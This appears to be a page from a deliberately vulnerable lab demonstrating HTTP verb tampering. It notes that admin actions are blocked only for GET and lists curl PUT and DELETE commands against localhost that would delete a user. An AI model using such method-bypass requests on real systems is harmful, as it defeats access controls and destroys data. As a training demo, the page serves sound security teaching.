HTTP Verb Tampering Demo
Request Method: GET
Verb Tampering Tests
This page only blocks GET for admin actions. Try these:
1. POST bypass (delete user)
2. POST bypass (change password)
3. Test with curl (PUT/DELETE)
# PUT request curl -X PUT -d "action=delete_user&username=test" http://localhost/verb.php # DELETE request curl -X DELETE http://localhost/verb.php